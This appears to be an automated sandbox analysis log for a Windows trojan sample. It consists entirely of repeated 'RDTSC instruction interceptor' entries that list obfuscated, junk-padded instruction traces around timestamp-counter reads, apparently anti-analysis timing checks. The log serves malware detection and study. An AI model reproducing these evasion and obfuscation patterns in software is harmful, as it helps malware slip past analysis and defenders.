Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E00688 second address: 4E006F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FABC9471C2Eh 0x00000011 add eax, 30F50238h 0x00000017 jmp 00007FABC9471C2Bh 0x0000001c popfd 0x0000001d push ecx 0x0000001e mov ch, bh 0x00000020 pop eax 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007FABC9471C2Eh 0x00000028 xchg eax, ebp 0x00000029 pushad 0x0000002a mov edx, esi 0x0000002c push eax 0x0000002d push edx 0x0000002e call 00007FABC9471C38h 0x00000033 pop ecx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E006F4 second address: 4E007C2 instructions: 0x00000000 rdtsc 0x00000002 mov si, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FABC90CD763h 0x00000011 and ecx, 0B7CEABEh 0x00000017 jmp 00007FABC90CD769h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FABC90CD760h 0x00000023 jmp 00007FABC90CD765h 0x00000028 popfd 0x00000029 popad 0x0000002a xchg eax, ecx 0x0000002b jmp 00007FABC90CD75Eh 0x00000030 push eax 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FABC90CD761h 0x00000038 sbb ecx, 1A2C7106h 0x0000003e jmp 00007FABC90CD761h 0x00000043 popfd 0x00000044 popad 0x00000045 xchg eax, ecx 0x00000046 pushad 0x00000047 mov ah, 5Bh 0x00000049 mov dx, A7A8h 0x0000004d popad 0x0000004e mov eax, dword ptr [775165FCh] 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007FABC90CD769h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E007C2 second address: 4E007C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E007C8 second address: 4E00831 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 call 00007FABC90CD766h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test eax, eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FABC90CD75Ah 0x0000001a jmp 00007FABC90CD765h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FABC90CD760h 0x00000026 and cx, B9F8h 0x0000002b jmp 00007FABC90CD75Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E00831 second address: 4E008E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FAC3BB04D3Eh 0x0000000f jmp 00007FABC9471C2Eh 0x00000014 mov ecx, eax 0x00000016 pushad 0x00000017 push esi 0x00000018 movsx ebx, si 0x0000001b pop ecx 0x0000001c movsx ebx, cx 0x0000001f popad 0x00000020 xor eax, dword ptr [ebp+08h] 0x00000023 jmp 00007FABC9471C37h 0x00000028 and ecx, 1Fh 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FABC9471C34h 0x00000032 and ecx, 25FF3848h 0x00000038 jmp 00007FABC9471C2Bh 0x0000003d popfd 0x0000003e mov dx, ax 0x00000041 popad 0x00000042 ror eax, cl 0x00000044 jmp 00007FABC9471C32h 0x00000049 leave 0x0000004a pushad 0x0000004b jmp 00007FABC9471C2Dh 0x00000050 popad 0x00000051 retn 0004h 0x00000054 nop 0x00000055 mov esi, eax 0x00000057 lea eax, dword ptr [ebp-08h] 0x0000005a xor esi, dword ptr [00962014h] 0x00000060 push eax 0x00000061 push eax 0x00000062 push eax 0x00000063 lea eax, dword ptr [ebp-10h] 0x00000066 push eax 0x00000067 call 00007FABCD952514h 0x0000006c push FFFFFFFEh 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E008E6 second address: 4E008EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E008EA second address: 4E008FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E008FD second address: 4E00946 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b mov dx, ax 0x0000000e movzx esi, bx 0x00000011 popad 0x00000012 ret 0x00000013 nop 0x00000014 push eax 0x00000015 call 00007FABCD5AE083h 0x0000001a mov edi, edi 0x0000001c jmp 00007FABC90CD75Bh 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FABC90CD760h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E00946 second address: 4E0094A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E0094A second address: 4E00950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E00950 second address: 4E00997 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c movzx eax, di 0x0000000f popad 0x00000010 movsx edx, si 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007FABC9471C2Eh 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FABC9471C37h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0008 second address: 4DB000C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB000C second address: 4DB0012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0012 second address: 4DB0108 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FABC90CD760h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FABC90CD761h 0x00000017 add ah, 00000026h 0x0000001a jmp 00007FABC90CD761h 0x0000001f popfd 0x00000020 mov ecx, 7443B057h 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 jmp 00007FABC90CD75Ah 0x0000002c mov ebp, esp 0x0000002e pushad 0x0000002f jmp 00007FABC90CD75Eh 0x00000034 movzx ecx, bx 0x00000037 popad 0x00000038 and esp, FFFFFFF8h 0x0000003b pushad 0x0000003c mov edi, 04E4F70Eh 0x00000041 pushfd 0x00000042 jmp 00007FABC90CD75Fh 0x00000047 adc ax, 3FBEh 0x0000004c jmp 00007FABC90CD769h 0x00000051 popfd 0x00000052 popad 0x00000053 xchg eax, ecx 0x00000054 pushad 0x00000055 mov ecx, 41CF4EA3h 0x0000005a pushfd 0x0000005b jmp 00007FABC90CD768h 0x00000060 or ecx, 02BA3FE8h 0x00000066 jmp 00007FABC90CD75Bh 0x0000006b popfd 0x0000006c popad 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 pushad 0x00000071 call 00007FABC90CD762h 0x00000076 pop ecx 0x00000077 mov di, A606h 0x0000007b popad 0x0000007c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0108 second address: 4DB010E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB010E second address: 4DB017A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007FABC90CD760h 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 mov edi, 1C55E9F0h 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007FABC90CD766h 0x0000001f xchg eax, ebx 0x00000020 jmp 00007FABC90CD760h 0x00000025 mov ebx, dword ptr [ebp+10h] 0x00000028 pushad 0x00000029 mov al, 34h 0x0000002b mov eax, edi 0x0000002d popad 0x0000002e push ecx 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 push esi 0x00000033 pop ebx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB017A second address: 4DB01BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FABC9471C32h 0x0000000e popad 0x0000000f mov dword ptr [esp], esi 0x00000012 jmp 00007FABC9471C30h 0x00000017 mov esi, dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FABC9471C2Ah 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB01BF second address: 4DB01CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB01CE second address: 4DB01D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB01D3 second address: 4DB0229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FABC90CD765h 0x0000000a jmp 00007FABC90CD75Bh 0x0000000f popfd 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 xchg eax, edi 0x00000014 jmp 00007FABC90CD766h 0x00000019 push eax 0x0000001a jmp 00007FABC90CD75Bh 0x0000001f xchg eax, edi 0x00000020 pushad 0x00000021 mov ax, 73EBh 0x00000025 push eax 0x00000026 push edx 0x00000027 mov dl, ch 0x00000029 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0229 second address: 4DB0273 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FABC9471C33h 0x00000008 sub ecx, 69E6B78Eh 0x0000000e jmp 00007FABC9471C39h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 test esi, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FABC9471C2Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0273 second address: 4DB0283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD75Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0283 second address: 4DB0287 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0287 second address: 4DB02D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FAC3B7ABADCh 0x0000000e jmp 00007FABC90CD767h 0x00000013 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001a jmp 00007FABC90CD766h 0x0000001f je 00007FAC3B7ABAB8h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push edi 0x00000029 pop eax 0x0000002a mov cx, bx 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB02D8 second address: 4DB0328 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007FABC9471C30h 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 jmp 00007FABC9471C30h 0x00000019 test edx, 61000000h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FABC9471C2Ah 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0328 second address: 4DB032C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB032C second address: 4DB0332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0332 second address: 4DB038D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FAC3B7ABA9Ah 0x0000000f jmp 00007FABC90CD760h 0x00000014 test byte ptr [esi+48h], 00000001h 0x00000018 jmp 00007FABC90CD760h 0x0000001d jne 00007FAC3B7ABA89h 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FABC90CD767h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB038D second address: 4DB03AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 999Ah 0x00000007 jmp 00007FABC9471C2Bh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test bl, 00000007h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB03AB second address: 4DB03B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA0721 second address: 4DA0725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA0725 second address: 4DA072B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA072B second address: 4DA0772 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FABC9471C32h 0x00000009 xor esi, 19B5DF28h 0x0000000f jmp 00007FABC9471C2Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebx 0x00000019 jmp 00007FABC9471C32h 0x0000001e mov dword ptr [esp], ebp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 movzx esi, di 0x00000027 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA0772 second address: 4DA0836 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FABC90CD769h 0x00000008 or eax, 058BB0A6h 0x0000000e jmp 00007FABC90CD761h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov cx, 6BD7h 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e mov ch, FEh 0x00000020 mov dx, 8648h 0x00000024 popad 0x00000025 and esp, FFFFFFF8h 0x00000028 jmp 00007FABC90CD767h 0x0000002d xchg eax, ebx 0x0000002e jmp 00007FABC90CD766h 0x00000033 push eax 0x00000034 jmp 00007FABC90CD75Bh 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b push ecx 0x0000003c pushfd 0x0000003d jmp 00007FABC90CD75Bh 0x00000042 sub ax, 7E9Eh 0x00000047 jmp 00007FABC90CD769h 0x0000004c popfd 0x0000004d pop esi 0x0000004e push edi 0x0000004f mov edx, ecx 0x00000051 pop eax 0x00000052 popad 0x00000053 push esi 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007FABC90CD75Bh 0x0000005b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA0836 second address: 4DA083C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA083C second address: 4DA0840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA0840 second address: 4DA0879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b jmp 00007FABC9471C37h 0x00000010 mov esi, dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FABC9471C30h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA0879 second address: 4DA087D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA087D second address: 4DA0883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA0883 second address: 4DA0894 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD75Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA0894 second address: 4DA0898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA0898 second address: 4DA08BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d jmp 00007FABC90CD75Ah 0x00000012 test esi, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov edx, 08EB0DD0h 0x0000001c mov bh, 36h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA08BC second address: 4DA08E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FAC3BB576E9h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FABC9471C30h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA08E5 second address: 4DA08E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA08E9 second address: 4DA08EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA08EF second address: 4DA098C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FABC90CD75Ch 0x00000009 or eax, 2CCC2478h 0x0000000f jmp 00007FABC90CD75Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001f pushad 0x00000020 pushad 0x00000021 mov eax, 4EF0E543h 0x00000026 mov dx, cx 0x00000029 popad 0x0000002a popad 0x0000002b mov ecx, esi 0x0000002d jmp 00007FABC90CD762h 0x00000032 je 00007FAC3B7B31BEh 0x00000038 jmp 00007FABC90CD760h 0x0000003d test byte ptr [77516968h], 00000002h 0x00000044 pushad 0x00000045 mov cl, 89h 0x00000047 push eax 0x00000048 push edx 0x00000049 pushfd 0x0000004a jmp 00007FABC90CD769h 0x0000004f add ch, FFFFFFD6h 0x00000052 jmp 00007FABC90CD761h 0x00000057 popfd 0x00000058 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA098C second address: 4DA09B2 instructions: 0x00000000 rdtsc 0x00000002 call 00007FABC9471C30h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jne 00007FAC3BB5763Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movzx ecx, dx 0x00000017 movsx edx, ax 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA09B2 second address: 4DA09B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA09B8 second address: 4DA09BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA09BC second address: 4DA09F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c jmp 00007FABC90CD765h 0x00000011 mov edi, ecx 0x00000013 popad 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FABC90CD764h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA09F9 second address: 4DA09FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA09FF second address: 4DA0A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD75Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA0A10 second address: 4DA0A49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FABC9471C39h 0x0000000f popad 0x00000010 xchg eax, ebx 0x00000011 jmp 00007FABC9471C2Eh 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA0A49 second address: 4DA0A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA0A4E second address: 4DA0A6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FABC9471C34h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA0A6D second address: 4DA0A7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA0A7C second address: 4DA0A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA0B23 second address: 4DA0B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA0B27 second address: 4DA0B2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
